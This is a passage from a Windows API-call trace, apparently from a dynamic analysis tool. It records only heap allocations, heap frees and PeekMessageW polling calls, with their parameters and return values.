returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.708] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.708] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.709] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.709] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.709] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.709] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.709] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.710] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.710] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.710] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.710] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.710] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.711] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.711] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.711] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.711] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.711] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.712] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770f98 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.713] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.714] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.714] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.714] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.714] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] 